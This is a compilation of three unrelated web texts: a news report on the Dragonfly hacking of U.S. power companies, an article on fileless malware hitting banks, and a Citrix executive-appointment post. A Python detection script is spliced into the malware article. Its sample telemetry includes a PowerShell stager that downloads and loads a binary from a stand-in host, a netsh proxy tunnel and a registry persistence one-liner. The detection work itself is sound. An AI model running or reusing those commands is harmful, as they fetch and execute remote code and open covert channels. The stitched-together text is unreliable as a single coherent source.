U.S. energy grid intrusion is a warning, says former NSA official



SAN FRANCISCO — Over the last nine months, dozens of U.S. power companies were compromised by an organized hacking group to the extent that some of them could have sabotaged and shut down production and distribution, according to Symantec, a cybersecurity company that discovered the attack.

In some cases this involved access to details about how the company operated, its engineering plans and equipment, and in some cases even the ability to control valves, pipes or conveyor belts, said Vikram Thakur, principal research manager at Symantec, which discovered the intrusions and first published information about them in a blog posting Wednesday.

The level of access could have led to “pretty strong impacts,” said Thakur. “It could have taken out the business for a period of a day or two or maybe a month,” he said.

The core targets appear to have been companies involved in power generation, transmission and distribution, Symantec said.

These attacks come as no surprise to anyone who has worked in intelligence, said Joel Brenner. He was head of U.S. counterintelligence under the Director of National Intelligence from 2006 to 2008 and then Inspector General of the National Security Agency from 2009 to 2010. He is now a senior research fellow at the Massachusetts Institute of Technology.

The aim is to make clear to the United States that its systems are vulnerable and thus make the president think twice before engaging in any kind of military action, with the looming threat of darkened cities a possibility, he said.

“I think preparation for a potential attack is what we’re seeing. And whoever’s doing this, presumably the Russians, want us to know. People in the intelligence business always say that when the Russians are found, it’s because they want to be found.”

There are already examples of power companies being attacked by hackers and the lights going out. In 2015 and 2016 hackers disrupted Ukraine’s power grid, causing blackouts that hit more than 200,000 people. The Ukrainian government has blamed Russian-supported hackers for the attacks.

Why things didn’t go that far in this case is unknown, though Symantec believes it might have been a “proof of concept” attack, simply to prove to whatever government or organization was sponsoring the attackers that they had the capability.

“This confirms, again, that advanced adversaries are targeting and gaining access to the world’s critical infrastructure,” said Galina Antova, co-founder of Claroty, a company that provides security for industrial control networks.

“This gives bad actors the ability to harm our systems and possibly people when they choose — as a political statement, during the next conflict, before or during a war,” she said.

The Department of Homeland Security said it was aware of the Symantec report and was reviewing it.

“At this time there is no indication of a threat to public safety. We continue to coordinate with government and private sector partners to look into this activity,” the agency said in a statement.

The North American Electric Reliability Corporation is aware of the threat and is sharing information with industry and government partners, said Bill Lawrence, director of NERC’s Electricity Information Sharing and Analysis Center.

“At this time, there are no impacts on the operation or reliability of the bulk power system in North America. NERC continues to monitor potential cyber security risks to reliability and share information with security stakeholders on emerging and evolving threats,” he said.


The ongoing attack appears to be the work of a group that Symantec and others first reported was targeting the energy sector beginning in 2011. Symantec dubbed it Dragonfly. CrowdStrike, which reported on the group in 2014, called it Energetic Bear and suggested it might have links to Russia.

Once the report went public in 2014, the group went dark. Then it appeared again in 2015, focused on Turkish energy companies that it continued to infiltrate through 2016, Thakur said.

Beginning in January, the attackers turned their attention to the United States and Switzerland. The initial attacks came through simple email phishing campaigns that got them into company networks, Symantec researchers found.

That led to two years of research and the discovery that Dragonfly 2.0 had penetrated “dozens” of companies.

“It’s still an ongoing campaign,” Thakur said.

Symantec shared information about the attackers with the companies and others who might have been impacted, but did not release their names in its public blog. Thakur said he has personally called between 50 and 75 energy companies in the past few months to warn them.

Thakur believes that energy-related companies have also been probed by the Dragonfly group, including companies that do commodity trading, finance organizations and investment groups.

The hackers appear to have made a concerted effort to make themselves difficult to identify by using only open-source and readily available malware that would not pinpoint their location.

Critical infrastructure is being targeted with complex, well-resourced cyber attacks, said Josh Douglas, chief strategy officer for cyber services at Raytheon, a major U.S. defense contractor and industrial corporation.

The attributes of the Dragonfly attack are similar to those perpetrated by nation-states with deep pockets and long-term goals.

“They have invested strongly in their capabilities — some of which we have yet to see — and that we may not yet know the full extent of this attack,” said Douglas.


Source: https://www.usatoday.com/story/tech/news/2017/09/06/dozens-power-companies-breached-hackers-cybersecurity-researcher-says/638503001/

New “Fileless Malware” Targets Banks and Organizations Spotted in the Wild

By: Swati Khandelwal
Source: http://thehackernews.com/2017/02/fileless-malware-bank.html


More than a hundred banks and financial institutions across the world have been infected with a dangerous, sophisticated, memory-based malware that is almost undetectable, researchers warned.

A newly published report by the Russian security firm Kaspersky Lab indicates that hackers are targeting banks, telecommunication companies and government organizations in 40 countries, including the US and countries in South America, Europe and Africa, with fileless malware that resides solely in the memory of the compromised computers.

Fileless malware, which the same security firm first reported in 2014, had not been mainstream until now. It is a piece of nasty software that does not write any files or folders to the hard drive in order to execute. Instead, payloads are injected directly into the memory of running processes, and the malware runs entirely in the system’s RAM.

Because the malware lives only in memory, its traces disappear as soon as the system is rebooted, leaving nothing on disk to acquire and making it difficult for digital forensic experts to find evidence that it was ever there.

The attack was initially discovered by a bank’s security team after they found a copy of Meterpreter — an in-memory component of Metasploit — inside the physical memory of a Microsoft domain controller.


After conducting a forensic analysis, Kaspersky researchers found that the attackers leveraged Windows PowerShell to load the Meterpreter code directly into memory rather than writing it to disk. The cyber crooks also used Microsoft’s netsh networking tool to set up a proxy tunnel for communicating with the command and control (C&C) server and remotely controlling the infected host.

They also stashed the PowerShell commands in the Windows registry in an effort to remove nearly all traces of the attack from logs or the hard drive after a reboot of the device, making detection and forensic analysis difficult. The ultimate goal of the attackers appears to have been to compromise the computers that control ATMs so that they could steal money.

Kaspersky Lab researchers plan to reveal more details in April about the attack, which is occurring on an industrial scale worldwide. It has already hit more than 140 enterprise networks across several business sectors, with most victims located in the US, France, Ecuador, Kenya, the UK and Russia. And since the threat is so hard to spot, the actual number is likely much higher.
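The three techniques described in the two paragraphs above (PowerShell loading code straight into memory, a netsh proxy tunnel to the C&C server, and PowerShell commands stashed in the registry) each leave a footprint in process-creation and registry telemetry even when nothing lands on disk. The following hunt script is an example added to this page, not code from Kaspersky or the article; it runs a few detection rules over Sysmon-style records. The records, the 203.0.113.10 address (documentation range), the `Updater` Run value and the `HKCU:\Software\Foo` staging key are all constructed for the example, and the field names (`type`, `cmdline`, `key`, `value`, `data`) are an assumed normalised log schema rather than any product's native format.

```python
"""Hunt for fileless-malware tradecraft in Sysmon-style process-creation and
registry-set records: PowerShell launched with an -EncodedCommand that stages
code into memory, netsh portproxy tunnels, and PowerShell stagers persisted
in registry autorun keys.

Example code added for this page; all records below are constructed and
are not taken from the Kaspersky report or any real incident.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en,
# -enc, ...), so match every prefix, longest first.
_ENC_PREFIXES = ["e", "ec"] + ["encodedcommand"[:n] for n in range(2, 15)]
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:" + "|".join(sorted(_ENC_PREFIXES, key=len, reverse=True))
    + r")\s+([A-Za-z0-9+/=]+)"
)

# Tokens that indicate code is being staged into memory rather than run from disk.
IN_MEMORY_TOKENS = re.compile(
    r"(?i)Reflection\.Assembly|VirtualAlloc|FromBase64String|"
    r"\bIEX\b|Invoke-Expression|DownloadString|DownloadData|Net\.WebClient"
)

# netsh interface portproxy add v4tov4 listenport=.. connectaddress=.. connectport=..
PORTPROXY = re.compile(r"(?i)\bnetsh(?:\.exe)?\s+interface\s+portproxy\s+add\s+v4tov4\b(.*)")

# Autorun locations where a persisted PowerShell one-liner would be planted.
AUTORUN_KEY = re.compile(r"(?i)\\CurrentVersion\\(?:Run|RunOnce)$|\\Winlogon$")


def encode_ps(command: str) -> str:
    """Encode a command the way 'powershell -EncodedCommand' expects: base64 of UTF-16LE."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload from a command line, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
        return None


def analyze_event(ev: dict) -> list:
    """Return a list of (rule, detail) findings for one record."""
    findings = []
    if ev["type"] == "process":
        cmd = ev["cmdline"]
        if re.search(r"(?i)\bpowershell(?:\.exe)?\b", cmd):
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                hits = sorted({h.group(0) for h in IN_MEMORY_TOKENS.finditer(decoded)})
                if hits:
                    findings.append(("powershell_in_memory_stager", ", ".join(hits)))
                else:
                    findings.append(("powershell_encoded_command", decoded[:80]))
        pp = PORTPROXY.search(cmd)
        if pp:
            p = dict(re.findall(r"(\w+)=(\S+)", pp.group(1)))
            findings.append(("netsh_portproxy_tunnel",
                             f"{p.get('listenport')} -> {p.get('connectaddress')}:{p.get('connectport')}"))
    elif ev["type"] == "registry":
        if AUTORUN_KEY.search(ev["key"]) and re.search(r"(?i)powershell", ev["data"]):
            decoded = decode_encoded_command(ev["data"]) or ev["data"]
            findings.append(("registry_persisted_powershell",
                             f"{ev['key']}\\{ev['value']}: {decoded[:80]}"))
    return findings


def hunt(events):
    """Run every rule over a list of records; returns [(index, rule, detail), ...]."""
    return [(i, rule, detail) for i, ev in enumerate(events) for rule, detail in analyze_event(ev)]


# Constructed sample telemetry (hypothetical host, IP in the 203.0.113.0/24 documentation range).
STAGER = ("$b=(New-Object Net.WebClient).DownloadData('http://203.0.113.10/s.bin');"
          "[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)")
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_ps(STAGER)},
    {"type": "process", "cmdline": "netsh interface portproxy add v4tov4 listenport=4444 "
                                   "connectaddress=203.0.113.10 connectport=8080"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "value": "Updater",
     "data": "powershell.exe -W Hidden -ec " + encode_ps(
         "IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String((gp HKCU:\\Software\\Foo).Stage)))")},
    # Benign records: a scheduled script run from disk and a firewall status query.
    {"type": "process", "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"type": "process", "cmdline": "netsh advfirewall show allprofiles"},
]

if __name__ == "__main__":
    for idx, rule, detail in hunt(SAMPLE_EVENTS):
        print(f"[{idx}] {rule}: {detail}")
```

The decoder handles the UTF-16LE base64 form PowerShell uses, so the registry rule decodes the persisted one-liner rather than alerting on opaque base64; the benign `-ExecutionPolicy Bypass -File` launch and the `netsh advfirewall` query produce no findings, which is the distinction a detection engineer has to preserve when tuning these rules for a fleet where PowerShell and netsh are used legitimately every day.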

Craig Stilwell Named VP of Worldwide Partner Strategy & Sales

As we look forward to new opportunities in 2017 and delivering a Citrix Summit that empowers our partners to achieve great success, I am excited to share that Citrix has appointed Craig Stilwell as Vice President of Worldwide Partner Strategy & Sales.


Many in the partner community already know Craig, who has been with Citrix for more than 17 years and understands our sales and channel strategy very well. We are thrilled to have him move into this very important position to lead our partner strategy and work with you all. Craig assumes the position previously held by Kimberly Martin, who is no longer with Citrix.

As the new worldwide channel leader, Craig will draw from his extensive sales and channel leadership experience to invigorate our commitment to our partners and their long-term success and profitability. Specifically, in the near-term Craig will focus on three priorities:

  • Drawing on his experience to lead a partner team aimed at maintaining our leadership in the enterprise market and increasing our presence in the mid-market.
  • Transitioning to the cloud, and the major role the channel has to play in the move from on-premises to the cloud.
  • Reducing the complexity of our channel programs and making it easier for partners to do business with Citrix.

Craig has more than 23 years of technology experience and, having spent the majority of his career at Citrix, knows our business extremely well. Most recently he served as Area Vice President of our U.S. Commercial business responsible for all sales and products in the U.S. Commercial segment. Previously, Craig served in several roles of increasing responsibility at Citrix, most notably as Vice President of Americas Channel Sales & Field Operations where he was not only responsible for Americas partners, but also marketing, renewal and inside sales, sales operations and field readiness.

Before joining Citrix, he was on the management team of an IT consulting firm based in South Florida, and served as a senior manager in the consumer products industry practice at Accenture.

Craig’s experience heading up our U.S. Commercial business and the Americas channel sales and field ops organization will be invaluable. We look forward to sharing more about our vision for 2017 with our partners next month at Citrix Summit in Anaheim! In the meantime, Craig will be reaching out to partners to say hello and always welcomes partners to contact him via LinkedIn.

By: Carlos Sartorius

Source: https://www.citrix.com/blogs/2016/12/06/craig-stilwell-named-vice-president-of-worldwide-partner-strategy-and-sales/